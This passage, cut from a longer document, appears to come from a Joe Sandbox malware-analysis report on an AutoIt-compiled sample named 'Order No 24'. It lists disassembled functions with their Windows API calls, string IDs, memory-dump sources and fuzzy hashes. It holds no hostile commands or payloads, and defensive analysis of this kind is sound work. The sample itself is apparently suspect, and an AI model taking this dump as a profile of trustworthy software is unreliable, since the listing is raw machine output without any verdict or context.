                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                                  • Opcode ID: c3b0ea6725ab48c2d7e59a36df9bb216e308ea122263e68220a03c5578d93956
                                                                                                                                  • Instruction ID: 5e697ceb5d405155a16b8dcdba2f4fe92173f1dd9be55fa842c45428c5e82e3e
                                                                                                                                  • Opcode Fuzzy Hash: c3b0ea6725ab48c2d7e59a36df9bb216e308ea122263e68220a03c5578d93956
                                                                                                                                  • Instruction Fuzzy Hash: E6E1BF75900258ABDF22CFA2CC84AEF7B78FF45710F148156FA19AA291D7758E42CF60
                                                                                                                                  Function 009E764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009E778A
                                                                                                                                  • GetDesktopWindow.USER32 ref: 009E779F
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 009E77A6
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 009E7808
                                                                                                                                  • DestroyWindow.USER32(?), ref: 009E7834
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009E785D
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009E787B
                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009E78A1
                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 009E78B6
                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009E78C9
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 009E78E9
                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 009E7904
                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 009E7918
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009E7930
                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 009E7956
                                                                                                                                  • GetMonitorInfoW.USER32 ref: 009E7970
                                                                                                                                  • CopyRect.USER32(?,?), ref: 009E7987
                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 009E79F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                  • Opcode ID: 3beed2f004dda1074709672bc5982ea7207ce8f039d0819923e1bb4d7d611ffa
                                                                                                                                  • Instruction ID: b38087716298c4adc6a63f92e2187a8abfd89031a5f056d15bb6f610c37bf45e
                                                                                                                                  • Opcode Fuzzy Hash: 3beed2f004dda1074709672bc5982ea7207ce8f039d0819923e1bb4d7d611ffa
                                                                                                                                  • Instruction Fuzzy Hash: 6CB16A71608341AFDB05DFA5C988B6AFBE5BF88310F00891DF5999B291DB71EC05CB92
                                                                                                                                  Function 009C6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009C6CFB
                                                                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009C6D21
                                                                                                                                  • _wcscpy.LIBCMT ref: 009C6D4F
                                                                                                                                  • _wcscmp.LIBCMT ref: 009C6D5A
                                                                                                                                  • _wcscat.LIBCMT ref: 009C6D70
                                                                                                                                  • _wcsstr.LIBCMT ref: 009C6D7B
                                                                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 009C6D97
                                                                                                                                  • _wcscat.LIBCMT ref: 009C6DE0
                                                                                                                                  • _wcscat.LIBCMT ref: 009C6DE7
                                                                                                                                  • _wcsncpy.LIBCMT ref: 009C6E12
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                  • API String ID: 699586101-1459072770
                                                                                                                                  • Opcode ID: 5edced4b4a7dbe4697b3a5cfa21e595200dacdfe3f5ec4a1e05f292de878803e
                                                                                                                                  • Instruction ID: f9015f5ac8b8c7d3e98471c94a52ebbdf3454900a3570d281fcc99a7cf45682a
                                                                                                                                  • Opcode Fuzzy Hash: 5edced4b4a7dbe4697b3a5cfa21e595200dacdfe3f5ec4a1e05f292de878803e
                                                                                                                                  • Instruction Fuzzy Hash: FE41D972A002047BEB00AB78DC47FBF777CEF86710F044869F905E6182EB759A01D6A6
                                                                                                                                  Function 0099A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099A939
                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 0099A941
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099A96C
                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 0099A974
                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0099A999
                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0099A9B6
                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0099A9C6
                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0099A9F9
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0099AA0D
                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 0099AA2B
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 0099AA47
                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0099AA52
                                                                                                                                    • Part of subcall function 0099B63C: GetCursorPos.USER32(000000FF), ref: 0099B64F
                                                                                                                                    • Part of subcall function 0099B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                                                                                                                    • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                                                                                                                    • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,0099AB87), ref: 0099AA79
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                  • Opcode ID: b5c57b4560576ae4f3e515d80e75ae2be02312d15c5fedd63ad796099df12728
                                                                                                                                  • Instruction ID: 0f915360ab4d3edfa2e098a95ee6bb7a8bbb97a28c30b07d64f3928cd11995dc
                                                                                                                                  • Opcode Fuzzy Hash: b5c57b4560576ae4f3e515d80e75ae2be02312d15c5fedd63ad796099df12728
                                                                                                                                  • Instruction Fuzzy Hash: D4B1AB75A0120AAFDF14DFE8CC45BAE7BB9FB48310F114219FA05A7290DB74E842CB51
                                                                                                                                  Function 00982EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Foreground
                                                                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                  • API String ID: 62970417-1919597938
                                                                                                                                  • Opcode ID: f3e8d2026210d10540b91755556e12f3dfc899920839c78f0e7e9839d7ba7013
                                                                                                                                  • Instruction ID: 13b940f9405b37b708a876ca11645d4c838bf6994b42116efedd5da0a24067f1
                                                                                                                                  • Opcode Fuzzy Hash: f3e8d2026210d10540b91755556e12f3dfc899920839c78f0e7e9839d7ba7013
                                                                                                                                  • Instruction Fuzzy Hash: E7D1E93050874A9BCB04EF64C481BBAFBB4BF94344F104D1DF596572A1DB70E99ACB91
                                                                                                                                  Function 009E3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E3735
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A1DC00,00000000,?,00000000,?,?), ref: 009E37A3
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009E37EB
                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 009E3874
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009E3B94
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 009E3BA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                                  • Opcode ID: 23a8b33019e6c327c97ae47491beca40388089445b1cee214f6108a7679289d1
                                                                                                                                  • Instruction ID: a74a01645ad5fc439addcb9b2409b3b47d7d460a42b7234f350d1f3aee2c5d81
                                                                                                                                  • Opcode Fuzzy Hash: 23a8b33019e6c327c97ae47491beca40388089445b1cee214f6108a7679289d1
                                                                                                                                  • Instruction Fuzzy Hash: EB025C75604601AFCB15EF25C855B2AB7E9FF88720F04895DF98A9B3A1DB30ED01CB81
                                                                                                                                  Function 009E6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 009E6C56
                                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009E6D16
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                  • API String ID: 3974292440-719923060
                                                                                                                                  • Opcode ID: ed003bdfd12ee19a5f188212cbd6e681eb54bf0a2ccdd521dc60f74ac95e3a84
                                                                                                                                  • Instruction ID: d973d500831b5122c3fc3b6826206b6d848c6801b72f08e223082276e6dfc83a
                                                                                                                                  • Opcode Fuzzy Hash: ed003bdfd12ee19a5f188212cbd6e681eb54bf0a2ccdd521dc60f74ac95e3a84
                                                                                                                                  • Instruction Fuzzy Hash: A2A16C302043819BCB15EF25C951B7AB7A5BF94354F144D6DB8A69B3D2EB30ED06CB81
                                                                                                                                  Function 009BCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 009BCF91
                                                                                                                                  • __swprintf.LIBCMT ref: 009BD032
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD045
                                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009BD09A
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD0D6
                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 009BD10D
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 009BD15F
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009BD195
                                                                                                                                  • GetParent.USER32(?), ref: 009BD1B3
                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 009BD1BA
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 009BD234
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD248
                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 009BD26E
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD282
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                  • String ID: %s%u
                                                                                                                                  • API String ID: 3119225716-679674701
                                                                                                                                  • Opcode ID: c9b520f1eb9b94b3279773095465551a340d1a66c51bddb7f6d4bcd2dc13ac92
                                                                                                                                  • Instruction ID: 080c628afe86bf42916cd2429681baa3f7fe728cfa1fbfe779269da2b640fd02
                                                                                                                                  • Opcode Fuzzy Hash: c9b520f1eb9b94b3279773095465551a340d1a66c51bddb7f6d4bcd2dc13ac92
                                                                                                                                  • Instruction Fuzzy Hash: A0A1D271609746AFD714DF64C984FEAB7ACFF44324F008529F9A9D2180EB30EA46CB91
                                                                                                                                  Function 009BD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 009BD8EB
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD8FC
                                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 009BD924
                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 009BD941
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD95F
                                                                                                                                  • _wcsstr.LIBCMT ref: 009BD970
                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 009BD9A8
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD9B8
                                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 009BD9DF
                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 009BDA28
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BDA38
                                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 009BDA60
                                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 009BDAC9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                                  • Opcode ID: a51be4e14e13e303e8f09f4c94aadac2487fedf5a938f292345c7a8190398021
                                                                                                                                  • Instruction ID: be29b361940a160bb5f5bbfe7a42c6810616dc1783eae9165f1611569806acd6
                                                                                                                                  • Opcode Fuzzy Hash: a51be4e14e13e303e8f09f4c94aadac2487fedf5a938f292345c7a8190398021
                                                                                                                                  • Instruction Fuzzy Hash: B681A1710093059BDB05DF50CA85FAA7BECFF84724F04846AFD899A096EB34DD46CBA1
                                                                                                                                  Function 009BD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                                  • Opcode ID: 6ff714dece3125c7b5d172eae6f95d3adfe5282d7e14736c53cc32e49e4815a5
                                                                                                                                  • Instruction ID: 580fdd453cc67fb99e770f8fd61c9e3e7cef68d88c0b239b1cbeedbe2635f154
                                                                                                                                  • Opcode Fuzzy Hash: 6ff714dece3125c7b5d172eae6f95d3adfe5282d7e14736c53cc32e49e4815a5
                                                                                                                                  • Instruction Fuzzy Hash: 80316C71644205BADB14FE60DE93FEDB7B8AFA1721F200929F441B51D1FF61AA04C791
                                                                                                                                  Function 009BEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000063), ref: 009BEAB0
                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009BEAC2
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 009BEAD9
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 009BEAEE
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 009BEAF4
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 009BEB04
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 009BEB0A
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009BEB2B
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009BEB45
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009BEB4E
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 009BEBB9
                                                                                                                                  • GetDesktopWindow.USER32 ref: 009BEBBF
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 009BEBC6
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 009BEC12
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 009BEC1F
                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 009BEC44
                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009BEC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3869813825-0
                                                                                                                                  • Opcode ID: b23f5cdfa844fcb9cf98eaa6324afe64d12303e5efe778672af2e2290eb41621
                                                                                                                                  • Instruction ID: f9887f3b7c5d3919123212fbbe7eb56e5e6a81dccf74d890c97571a7bd8d9e25
                                                                                                                                  • Opcode Fuzzy Hash: b23f5cdfa844fcb9cf98eaa6324afe64d12303e5efe778672af2e2290eb41621
                                                                                                                                  • Instruction Fuzzy Hash: A4515E71900709EFDB20DFA9CE89FAEBBF9FF04714F004928E586A25A0C775A945CB10
                                                                                                                                  Function 009D79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 009D79C6
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 009D79D1
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 009D79DC
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 009D79E7
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 009D79F2
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 009D79FD
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 009D7A08
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 009D7A13
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 009D7A1E
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 009D7A29
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 009D7A34
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 009D7A3F
